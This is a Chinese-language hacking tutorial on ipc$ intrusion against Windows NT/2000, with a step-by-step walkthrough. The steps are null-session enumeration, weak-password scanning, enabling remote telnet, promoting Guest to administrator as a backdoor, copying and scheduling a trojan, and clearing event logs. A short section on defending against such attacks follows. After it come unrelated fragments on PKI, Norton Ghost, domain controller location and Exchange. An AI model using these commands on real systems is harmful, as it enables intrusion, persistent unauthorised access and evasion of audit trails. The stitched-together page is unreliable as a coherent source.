空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:
Everyone
Network
在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?
四 空会话可以做什么
对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:
1 首先,我们先建立一个空会话(需要目标开放ipc$)
命令:net use \\ip\ipc$ "" /user:""
注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。
2 查看远程主机的共享资源
命令:net view \\IP
解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成。
3 查看远程主机的当前时间
命令:net time \\IP
解释:用此命令可以得到一个远程主机的当前时间。
4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:
Node IpAddress: [*.*.*.*] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered
MAC Address = 00-50-8B-9A-2D-37
以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?
五 ipc$所使用的端口
首先我们来了解一些基础知识:
1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;
2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
3 在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。
有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:
对于win2000客户端来说:
1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了NBT后的win 2000对win NT的共享访问将会失败。
对于win2000服务器端来说:
1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放;
2 如果禁止NBT,那么只有445端口开放。
我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。
六 ipc$连接在hack攻击中的意义
就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。
是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!
七 ipc$连接失败的常见原因
以下是一些常见的导致ipc$连接失败的原因:
1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;
2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;
3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);
4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);
5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;
6 对方禁止了NBT(即未打开139端口);
7 对方防火墙屏蔽了139和445端口;
8 你的用户名或者密码错误(显然空会话排除这种错误);
9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;
10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。
另外,你也可以根据返回的错误号分析原因:
错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;
错误号51,Windows无法找到网络路径:网络有问题;
错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);
错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;
错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;
错误号1326,未知的用户名或错误密码:原因很明显了;
错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;
错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
八 复制文件失败的原因
有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?
1 盲目复制
这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。
2 默认共享判断错误
这类错误也是大家经常犯的,主要有两个小方面:
1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;
2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)
3用户权限不够,包括四种情形:
1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;
2)向默认共享复制时,要具有管理员权限;
3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);
4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;
还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。
4被防火墙杀死或在局域网
也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。
呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。
九 如何打开目标的IPC$共享以及其他共享
目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。
十 一些需要shell才能完成的命令
br />看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:
1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;
2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;
3 运行/关闭远程主机的服务,需要在shell下完成;
4 启动/杀掉远程主机的进程,也需要在shell下完成。
十一 入侵中可能会用到的相关命令
请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。
1 建立空连接:
net use \\IP\ipc$ "" /user:""
2 建立非空连接:
net use \\IP\ipc$ "psw" /user:"account"
3 查看远程主机的共享资源(但看不到默认共享)
net view \\IP
4 查看本地主机的共享资源(可以看到本地的默认共享)
net share
5 得到远程主机的用户名列表
nbtstat -A IP
6 得到本地主机的用户列表
net user
7 查看远程主机的当前时间
net time \\IP
8 显示本地主机当前服务
net start
9 启动/关闭本地服务
net start 服务名 /y
net stop 服务名 /y
10 映射远程共享:
net use z: \\IP\baby
此命令将共享名为baby的共享资源映射到z盘
11 删除共享映射
net use c: /del 删除映射的c盘,其他盘类推
net use * /del /y删除全部
12 向远程主机复制文件
copy \路径\srv.exe \\IP\共享目录名,如:
copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内
13 远程添加计划任务
at \\ip 时间 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径
14 开启远程主机的telnet
这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:
1)目标开启了ipc$共享
2)你要拥有管理员密码和帐号
3)目标开启RemoteRegistry服务,用户就该ntlm认证
4)对WIN2K/XP有效,NT未经测试
命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port
试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90
15 激活用户/加入管理员组
1 net uesr account /active:yes
2 net localgroup administrators account /add
16 关闭远程主机的telnet
同样需要一个小程序:ResumeTelnet.exe
命令格式:ResumeTelnet.exe \\server account psw
试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""
17 删除一个已建立的ipc$连接
net use \\IP\ipc$ /del
(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)
十二 ipc$完整入侵步骤祥解
其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!
1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空
2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧
3上面开telnet的命令没忘吧,要用到opentelnet这个小程序
c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90
如果返回如下信息
*******************************************************
Remote Telnet Configure, by refdom
Email: refdom@263.net
OpenTelnet.exe
Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport
*******************************************************
Connecting \\192.168.21.*...Successfully!
NOTICE!!!!!!
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23
Starting telnet service...
telnet service is started successfully! telnet service is running!
BINGLE!!!Yeah!!
Telnet Port is 90. You can try:"telnet ip 90", to connect the server!
Disconnecting server...Successfully!
*说明你已经打开了一个端口90的telnet。
4 现在我们telnet上去
telnet 192.168.21.* 90
如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了
5 C:\>net user guest /active:yes
*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no
6 C:\>net user guest 1234
*将Guest的密码改为1234,或者改成你喜欢的密码
7 C:\>net localgroup administrators guest /add
*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。
8 好了,现在我们来走另一条路,给它传个木马玩玩
9 首先,我们先建立起ipc$连接
C:\>net use \\192.168.21.*\ipc$ "" /user:administrator
10 既然要上传东西,就要先知道它开了什么共享
C:\>net view \\192.168.21.*
在 \\192.168.21.*的共享资源
资源共享名 类型 用途 注释
-----------------------------------------------------------
C Disk
D Disk
命令成功完成。
*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。
11 C:\>copy love.exe \\192.168.21.*\c
已复制 1 个文件
*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是最好的了,不容易被发现
12 运行木马前,我们先看看它现在的时间
net time \\192.168.21.*
\\192.168.21.*的当前时间是 2003/8/22 上午 11:00
命令成功完成
13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了
C:\>at \\192.168.21.* 11:02 c:\love.exe
新加了一项作业,其作业 ID = 1
14 剩下就是等了,等过了11:02,你就可以用控制端去连接了,如果成功你将可以用图形界面去控制远程主机了,如果连接失败,那么它可能在局域网里,也可能程序被防火墙杀了,还可能它下线了(没这么巧吧),无论哪种情况你只好放弃了
嗯,好了,两种基本方法都讲了。如果你对上面的操作已经轻车熟路了,也可以用更高效的套路,比如用CA克隆guest,用psexec执行木马,用命令:psexec \\tergetIP -u user -p paswd cmd.exe直接获得shell等,这些都是可以得,随你的便。不过最后不要忘了把日志清理干净,可以用榕哥的elsave.exe。
讲了ipc$的入侵,就不能不说如何防范,那么具体要怎样做呢?看下面
十三 如何防范ipc$入侵
1 禁止空连接进行枚举(此操作并不能阻止空连接的建立)
方法1:
运行regedit,找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把RestrictAnonymous = DWORD的键值改为:1
如果设置为"1",一个匿名用户仍然可以连接到IPC$共享,但限制通过这种连接得到列举SAM帐号和共享等信息;在Windows 2000 中增加了"2",限制所有匿名访问除非特别授权,如果设置为2的话,可能会有一些其他问题发生,建议设置为1。如果上面所说的主键不存在,就新建一个再改键值。
方法2:
在本地安全设置-本地策略-安全选项-在'对匿名连接的额外限制'中做相应设置
2 禁止默认共享
1)察看本地共享资源
运行-cmd-输入net share
2)删除共享(重起后默认共享仍然存在)
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,……可以继续删除)
3)停止server服务
net stop server /y (重新启动后server服务会重新开启)
4)禁止自动打开默认共享(此操作并未关闭ipc$共享)
运行-regedit
server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer(DWORD)的键值改为:00000000。
pro版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareWks(DWORD)的键值改为:00000000。
如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。
这两个键值在默认情况下在主机上是不存在的,需要自己手动添加。
3 关闭ic$和默认共享依赖的服务:server服务
控制面板-管理工具-服务-找到server服务(右击)-属性-常规-启动类型-选已禁用
这时可能会有提示说:XXX服务也会关闭是否继续,因为还有些次要的服务要依赖于lanmanserver,不要管它。
4 屏蔽139,445端口
由于没有以上两个端口的支持,是无法建立ipc$的,因此屏蔽139,445端口同样可以阻止ipc$入侵。
1)139端口可以通过禁止NBT来屏蔽
本地连接-TCP/IT属性-高级-WINS-选‘禁用TCP/IT上的NETBIOS’一项
2)445端口可以通过修改注册表来屏蔽
添加一个键值
Hive: HKEY_LOCAL_MACHINE
Key: System\Controlset\Services\NetBT\Parameters
Name: SMBDeviceEnabled
Type: REG_DWORD
Value: 0
修改完后重启机器
注意:如果屏蔽掉了以上两个端口,你将无法用ipc$入侵别人。
3)安装防火墙进行端口过滤
5 设置复杂密码,防止通过ipc$穷举出密码。
十四 ipc$入侵问答精选
上面说了一大堆的理论东西,但在实际中你会遇到各种各样的问题,因此为了给予大家最大的帮助,我看好几个安全论坛,找了n多的帖子,从中整理了一些有代表性的问答,其中的一些答案是我给出的,一些是论坛上的回复,如果有什么疏漏和错误,还请包涵。
1.进行ipc$入侵的时候,会在服务器中留下记录,有什么办法可以不让服务器发现吗?
答:留下记录是一定的,你走后用程序删除就可以了,或者用肉鸡入侵。
2.你看下面的情况是为什么,可以连接但不能复制
net use \\***.***.***.***\ipc$ "密码" /user:"用户名"
命令成功
copy icmd.exe \\***.***.***.***\admin$
找不到网络路径
命令不成功
答:可能有两个原因:
1)你的权限不够,不能访问默认共享;
2)对方没有开启admin$默认共享,不要认为能进行ipc$连接,对方就一定开了默认共享(很多人都这么以为,误区!!),此时你可以试试别的默认共享或普通共享,比如c$,d$,c,d等,如果还是不行,就要看你的权限了,如果是管理员权限,你可以开telnet,如果能成功,在给它开共享也行。
3.如果对方开了IPC$,且能建立空联接,但打开C、D盘时,都要求密码,我知道是空连接没有太多的权限,但没别的办法了吗?
答:建议先用流光或者别的什么猜解一下密码,如果猜不出来,只能放弃,毕竟空连接的能力有限。
4.我已经猜解到了管理员的密码,且已经ipc$连接成功了,但net view \\ip发现它没开默认共享,我该怎么办?
答:首先纠正你的一个错误,用net view是无法看到默认共享的。既然你现在有管理员权限,而且对方又开了ipc$,建议你用opentelnet.exe这个小程序打开它的telent,在获得了这个shell之后,做什么都可以了。
5.ipc$连接成功后,我用下面的命令建立了一个帐户,却发现这个帐户在我自己的机器上,这是怎么回事?
net uset ccbirds /add
答:ipc$建立成功只能说明你与远程主机建立了通信隧道,并不意味你取得了一个shell,只有在获得一个shell之后,你才能在远程建立一个帐户,否则你的操作只是在本地进行。
6.我已进入了一台肉机,用的管理员帐号,可以看他的系统时间,但是复制程序到他的机子上却不行,每次都提示“拒绝访问,已复制0个文件”,是不是对方有什么服务没开,我该怎么办?
答:不能copy文件有多个可能,除了权限不够外,还可能是对方c$,d$等默认管理共享没开,或者是对方为NTFS文件格式,通过设置,管理员也未必能远程写文件。既然你有管理员权限,那就开telnet上去吧,然后在开它的共享。
7.我用Win98能与对方建立ipc$连接吗?
答:不可以的,要进行ipc$的操作,建议用win2000
8.我用net use \\ip\ipc$ "" /user ""成功的建立了一个空会话,但用nbtstat -A IP 却无法导出用户列表,这是为什么?
答:空会话在默认的情况下是可以导出用户列表的,但如果管理员通过修改注册表来禁止导出列表,就会出现你所说的情况;或者你自己的NBT没有打开,netstat是建立在NBT之上的。
9.我建立ipc$连接的时候返回如下信息:‘提供的凭据与已存在的凭据集冲突’,怎么回事?
答:呵呵,这说明你与目标主机建立了一个以上的ipc$连接,这是不允许的,把其他的删掉吧:net use \\*.*.*.*\ipc$ /del
10.我在映射的时候出现:
F:\>net use h: \\211.161.134.*\e$
系统发生 85 错误。
本地设备名已在使用中。这是怎么回事?
答:你也太粗心了吧,这说明你的h盘正在使用,映射到别的盘符吧!
11.我建立了一个连接f:\>net use \\*.*.*.*\ipc$ "123" /user:"ccbirds" 成功了,但当我映射时出现了错误,向我要密码,怎么回事?
F:\>net use h: \\*.*.*.*\c$
密码在 \\*.*.*.*\c$ 无效。
请键入 \\*.*.*.*\c$ 的密码:
系统发生 5 错误。
拒绝访问。
答:呵呵,向你要密码说明你当前使用的用户权限不够,不能映射C$这个默认共享,想办法提升权限或者找管理员的弱口令吧!默认共享一般是需要管理员权限的。
12.我用superscan扫到了一个开了139端口的主机,但为什么不能空连接呢?
答:你混淆了ipc$与139的关系,能进行ipc$连接的主机一定开了139或445端口,但开这两个端口的主机可不一定能空连接,因为对方可以关闭ipc$共享.
13.我门局域网里的机器大多都是xp,我用流光扫描到几个administrator帐号口令是空,而且可以连接,但不能复制东西,说错误5。请问为什么?
答:xp的安全性要高一些,在安全策略的默认设置中,对本地帐户的网络登录进行身份验证的时候,默认为来宾权限,即使你用管理员远程登录,也只具有来宾权限,因此你复制文件,当然是错误5:权限不够。
14.我用net use \\192.168.0.2\ipc$ "password" /user:"administrator" 成功,可是 net use i: \\192.168.0.2\c
出现请键入 \\192.168.0.2 的密码,怎么回事情呢?
答:虽然你具有管理员权限,但管理员在设置c盘共享权限时可能并未设置允许administrator访问,所以会出现问题。
15.如果自己的机器禁止了ipc$, 是不是还可以用ipc连接别的机器?
答:可以的。
在 Windows 2000 中使用 Ntdsutil 查找和清理重复的安全标识符
Microsoft Scripting Guys 专门解答与系统管理脚本编写有关的常见问题
2005年7月
2005年6月
2005 年 4 月
2005 年 3 月
2005 年 2 月
2005 年 1 月
2004 年 12 月
2004 年 10 月
2004 年 9 月
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
2004 年 8 月
| ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
私有密钥 公共密钥的区别
1、私有密钥 公共密钥的区别?
答:公共密钥:与公钥算法一起使用的密钥对的 非秘密的 一半。公钥通常用于加密 会话密钥、验证数字签名或加密可以用相应的私钥解密的数据。
私有密钥:与公钥算法一起使用的密钥对的 秘密的 一半。私钥通常用于 解密 对称会话密钥、数字签名数据或已用相应公钥加密的解密数据。
2、公共密钥基础结构和证书认证体系是什么关系?
答:PKI:通常用于描述规范或管理证书和公、私钥的法律、政策、标准和软件的术语。在实践中,它是检验和验证与电子事务相关的每一方的数字证书、证书认证和其他注册颁发机构的系统。
证书:用于对在不安全网络(如 Internet)上的信息进行身份验证和安全交换的数据集。证书将公钥安全地绑定到持有相应私钥的实体中。证书由颁发证书的机构进行数字签名,并且可被管理以便用于用户、计算机或服务。被最广泛接受的证书格式由 ITU-T X.509 国际标准定义。
后者是前者的一种具体实现方法。
3、用户使用公共密钥,私有密钥加密传输数据,另一用户接受解密的全过程具体是怎么样的?(公共密钥和私有密钥在其中的扮演的角色)
答:发送加密数据--然后利用公共密密钥加密会话密钥--传输数据--接收方接收数据--用私钥解密公共密钥得到会话密钥--接收方利用会话密钥解密数据。
公钥加密密钥,私钥解密公钥得到会话密钥
经典教程汇集
Norton Ghost 知识库
Situation: 当使用 Ghost 将映像文件直接保存到 CD-R 或者 CD-RW 盘时,出现出错信息、驱动器消失或过程失败,而无法继续。 |
Situation: 希望知道 Ghost 可以直接写入哪些 CD-R 和 CD-RW 驱动器。 |
Situation: 您希望了解可以将 Ghost Multicast Server for NetWare 用于哪些 Netware 版本 |
Situation: 希望了解如何处理在 Ghost 中看到的错误消息。 |
Situation: You want to know what hardware and software Ghost will work with. |
Situation: 您希望了解 Ghost 浏览器是否支持 NTFS 驱动器。 |
Situation: 由于术语不易理解,因此您难以按 Ghost 文档中的说明执行操作。您想要了解 Ghost 各术语的含义。 |
Situation: 您希望了解 Ghost 是否与 Windows 2000 和 Windows XP Active Directory 兼容 |
Situation: 希望了解当计算机上安装了 GoBack 时,Ghost 能否正确创建和还原映像。 |
Situation: 您希望了解 Ghost 是否能够克隆 HPFS 驱动器。 |
Situation: 您希望使用启用 Internet 组管理协议 (IGMP) 的交换机和启用 IGMP 的路由器来减少网络通信量。您希望了解 Ghost多点传送和 Ghost 企业控制台是否兼容 IGMP? |
Situation: 您希望了解 Ghost 是否可以通过使用 Intel® AnyPoint Phoneline Home Network 或 Intel® AnyPointcan Wireless Home Network 的对等 TCP/IP 连接进行工作。 |
Situation: 您准备使用 Ghost 克隆安装了 Linux 操作系统的计算机,因此想知道您的 Linux 版本是否与 Ghost 一起接受过测试。 |
Situation: 您希望了解 Ghost 是否可以克隆位于 Novell 服务器上的硬盘驱动器。 |
Situation: 本文介绍 Ghost 与 使用 RAID 的计算机的兼容性。 |
Situation: 您希望将 Ghost 与 SNAP 服务器一起使用。 |
Situation: 您希望使用 Ghost 克隆 Unix 驱动器或分区 |
Situation: 您希望了解是否可以在虚拟局域网 (VLAN) 上使用 Ghost 多点传送服务器、GhostCast 服务器和 Ghost 控制台。 |
Situation: 要使用 Ghost 克隆装有 Windows 2000 Professional 操作系统的计算机,并希望了解 Ghost 是否与 Windows 2000 Professional 相兼容。 |
Situation: 您希望了解 Ghost 是否可以工作在运行 Windows 95 或 Windows 98 的计算机上。 |
Situation: 您想使用 Ghost 来克隆包含 Windows Millennium Edition (Windows Me) 操作系统的计算机,希望了解 Ghost 是否与 Windows Me 兼容。 |
Situation: 您希望了解 Ghost 是否支持 Windows 2000 动态磁盘。 |
Situation: 您在网络或个人客户机上安装了防火墙,希望了解 Ghost 与您的防火墙是否兼容。 |
Situation: 您希望了解 Ghost 可以克隆哪些文件系统,以及针对您所使用的特定的文件系统,应考虑哪些重要细节。 |
Situation: 您使用了为盲人设计的软件(如 Slimware 的 Window Bridge),该软件使用语音合成器来朗读屏幕上显示的内容。使用 Ghost 时,该软件无法识别图形用户界面 (GUI),因此将其视为空白。 |
Situation: 您使用压缩实用程序(如 DriveSpace、DoubleSpace、Stacker)创建了一个压缩驱动器。您希望创建该驱动器的映像并将该映像保存为文件 |
Situation: 此处是有关各种 Ghost 版本增强功能的信息。 |
Situation: 希望解决 Ghost 网络启动盘出现的问题。 |
Situation: 希望创建 Ghost 网络启动盘或 Ghost 对等网络启动盘。 |
Situation: 希望创建 Ghost 映像并将映像文件写入 CD-ROM 刻录机中。 |
在Windows XP中如何定位域控制器
在客户机(搜索域控制器的计算机)上,定位器的启动是以对本地 Netlogon 服务执行远程过程调用 (RPC) 的形式执行的。定位器 DsGetDcName 应用程序编程接口 (API) 调用是通过 Netlogon 服务实现的。
客户机收集在选择一个域控制器时所需的信息,并使用 DsGetDcName 调用将这些信息传递到 Netlogon 服务。
客户机上的 Netlogon 服务使用收集的这些信息从一个域控制器中查找指定的域,采用的是下面两种方法之一:
1、对于 DNS 名称,Netlogon 通过使用 IP/DNS 兼容定位器查询 DNS--即在 DNS 将域名附加到指定 SRV 记录的适当的字符串后,DsGetDcName 调用 DnsQuery 调用从 DNS 读取“服务资源”(SRV) 记录和“A”记录。
2、登录到基于 Windows 的域的工作站向 DNS 查询一般形式的 SRV 记录:
_service._protocol.DnsDomainName
Active Directory 服务器通过 TCP 协议提供“轻量目录访问协议”(LDAP) 服务。因此,客户机通过向 DNS 查询以下形式的一条记录找到一个 LDAP 服务器:
_ldap._tcp.DnsDomainName
对于 NetBIOS 名称,Netlogon 通过使用 Microsoft Windows NT 4.0 版兼容定位器来执行域控制器发现(即通过使用特定于传输的机制,例如 WINS)。
在 Windows NT 4.0 及更早版本中,“discovery”是在主域或受信域中用于定位一个用于身份验证的域控制器的过程。
Netlogon 服务将一个数据报发送到注册该名称的计算机。对于 NetBIOS 域名,数据报是作为一个mailslot消息实现的。对于 DNS 域名,数据报是作为一个 LDAP 用户数据报协议 (UDP) 搜索实现的。(UDP 是无连接数据报传输协议,它是 TCP/IP 协议组的一部分。TCP 是一个面向连接的传输协议。)
每个可用的域控制器都响应此数据报,表明它当前处于运行状态,并将该信息返回到 DsGetDcName。
Netlogon 服务缓存域控制器信息,以便后续请求不必重复此发现过程。缓存此信息有利于保证使用同一域控制器时的一致性和 Active Directory 视图的一致性。
当一个客户机登录或加入网络时,它必须能够找到一个域控制器。此客户机向 DNS 发送一个“DNS 查找”查询以搜索域控制器,并优先在当前子网内查询。因此,客户机通过向 DNS 查询以下形式的一条记录找到一个域控制器:
_LDAP._TCP.dc._msdcs.domainname
在客户机找到一个域控制器后,它将使用 LDAP 建立通讯,以获得对 Active Directory 的访问权。作为此协商的一部分,域控制器根据客户机的 IP 子网来确定此客户机所在的站点。如果此客户机正在与一个不在最近(最佳)站点的域控制器通讯,此域控制器将返回此客户机的站点名称。
如果此客户机已经尝试在此站点中查找域控制器(例如,当客户机向 DNS 发送“DNS 查找”查询以在此客户机的子网内查找域控制器时),则此客户机将使用这个并非最佳的域控制器。否则,此客户机将使用此新的最佳站点名称重新执行一个特定于站点的 DNS 查找。域控制器使用一些目录服务信息来标识站点和子网。
在客户机找到一个域控制器后,此域控制器的条目将被缓存。如果此域控制器不在最佳站点,此客户机在十五分钟后将刷新缓存并丢弃缓存条目。然后它将尝试在它自己所在的站点内查找一个最佳的域控制器。
在客户机建立到域控制器的通讯路径之后,它就可以建立登录和身份验证凭证,而且,对于基于 Windows 的计算机,在必要时还可以建立一个安全通道。然后此客户机就可以在目录中执行常规查询和搜索信息了。
客户机建立一个到域控制器的 LDAP 连接以便登录。此登录过程要使用“安全帐户管理器”。因为通讯路径使用了 LDAP 接口,且此客户机是由一个域控制器进行身份验证的,所以此客户帐户在得到验证后通过“安全帐户管理器”传递到目录服务代理,然后到数据库层,最后到“可扩展存储引擎”(ESE) 中的数据库。
以上内容出自kb314861 http://support.microsoft.com/kb/314861
Exchange 2000&2003文章和资源下载总汇
一、Exchange 2003 技术文档库
新增功能
Exchange Server 2003 新增功能[中文版]
